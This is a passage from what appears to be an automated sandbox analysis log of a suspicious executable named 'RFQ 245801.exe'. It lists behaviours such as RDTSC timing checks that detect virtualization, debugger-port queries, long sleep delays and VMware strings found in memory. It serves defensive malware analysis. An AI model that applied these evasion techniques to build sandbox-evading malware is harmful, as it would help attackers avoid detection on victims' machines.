          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RFQ 245801.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ 245801.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 26A9904 second address: 26A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 26A9B7E second address: 26A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 1130000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 7780000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 8780000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 8930000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 9930000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6540Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3199Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2152Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7787Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 3812Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 6160Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13813
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.0 %
          Source: C:\Users\user\Desktop\RFQ 245801.exe TID: 6772Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep count: 2152 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep time: -4304000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep count: 7787 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep time: -15574000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep count: 3812 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep time: -7624000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep count: 6160 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep time: -12320000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ 245801.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000000.1743773191.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4164 mov eax, dword ptr fs:[00000030h]5_2_017F4164
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4164 mov eax, dword ptr fs:[00000030h]5_2_017F4164
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B8158 mov eax, dword ptr fs:[00000030h]5_2_017B8158
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]5_2_01726154
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]5_2_01726154
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C156 mov eax, dword ptr fs:[00000030h]5_2_0171C156
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov ecx, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01750124 mov eax, dword ptr fs:[00000030h]5_2_01750124
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov ecx, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E0115 mov eax, dword ptr fs:[00000030h]5_2_017E0115
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017501F8 mov eax, dword ptr fs:[00000030h]5_2_017501F8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F61E5 mov eax, dword ptr fs:[00000030h]5_2_017F61E5
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]5_2_017E61C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]5_2_017E61C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01760185 mov eax, dword ptr fs:[00000030h]5_2_01760185
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]5_2_017DC188
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]5_2_017DC188
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]5_2_017C4180
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]5_2_017C4180
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174C073 mov eax, dword ptr fs:[00000030h]5_2_0174C073
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01722050 mov eax, dword ptr fs:[00000030h]5_2_01722050
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6050 mov eax, dword ptr fs:[00000030h]5_2_017A6050
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6030 mov eax, dword ptr fs:[00000030h]5_2_017B6030
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A020 mov eax, dword ptr fs:[00000030h]5_2_0171A020
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C020 mov eax, dword ptr fs:[00000030h]5_2_0171C020
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A4000 mov ecx, dword ptr fs:[00000030h]5_2_017A4000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C0F0 mov eax, dword ptr fs:[00000030h]5_2_0171C0F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017620F0 mov ecx, dword ptr fs:[00000030h]5_2_017620F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0171A0E3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A60E0 mov eax, dword ptr fs:[00000030h]5_2_017A60E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017280E9 mov eax, dword ptr fs:[00000030h]5_2_017280E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A20DE mov eax, dword ptr fs:[00000030h]5_2_017A20DE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E60B8 mov eax, dword ptr fs:[00000030h]5_2_017E60B8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E60B8 mov ecx, dword ptr fs:[00000030h]5_2_017E60B8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017180A0 mov eax, dword ptr fs:[00000030h]5_2_017180A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B80A8 mov eax, dword ptr fs:[00000030h]5_2_017B80A8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172208A mov eax, dword ptr fs:[00000030h]5_2_0172208A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C437C mov eax, dword ptr fs:[00000030h]5_2_017C437C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov ecx, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EA352 mov eax, dword ptr fs:[00000030h]5_2_017EA352
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C8350 mov ecx, dword ptr fs:[00000030h]5_2_017C8350
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F634F mov eax, dword ptr fs:[00000030h]5_2_017F634F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]5_2_017A2349
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F8324 mov eax, dword ptr fs:[00000030h]5_2_017F8324
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F8324 mov ecx, dword ptr fs:[00000030h]5_2_017F8324
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F8324 mov eax, dword ptr fs:[00000030h]5_2_017F8324
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F8324 mov eax, dword ptr fs:[00000030h]5_2_017F8324
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C310 mov ecx, dword ptr fs:[00000030h]5_2_0171C310
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740310 mov ecx, dword ptr fs:[00000030h]5_2_01740310
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]5_2_0175A30B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]5_2_0175A30B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]5_2_0175A30B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]5_2_0173E3F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]5_2_0173E3F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]5_2_0173E3F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017563FF mov eax, dword ptr fs:[00000030h]5_2_017563FF
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]5_2_017303E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE3DB mov eax, dword ptr fs:[00000030h]5_2_017CE3DB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE3DB mov eax, dword ptr fs:[00000030h]5_2_017CE3DB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE3DB mov ecx, dword ptr fs:[00000030h]5_2_017CE3DB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE3DB mov eax, dword ptr fs:[00000030h]5_2_017CE3DB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C43D4 mov eax, dword ptr fs:[00000030h]5_2_017C43D4
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C43D4 mov eax, dword ptr fs:[00000030h]5_2_017C43D4
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DC3CD mov eax, dword ptr fs:[00000030h]5_2_017DC3CD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]5_2_0172A3C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]5_2_0172A3C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]5_2_0172A3C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]5_2_0172A3C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]5_2_0172A3C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]5_2_0172A3C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]5_2_017283C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]5_2_017283C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]5_2_017283C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]5_2_017283C0
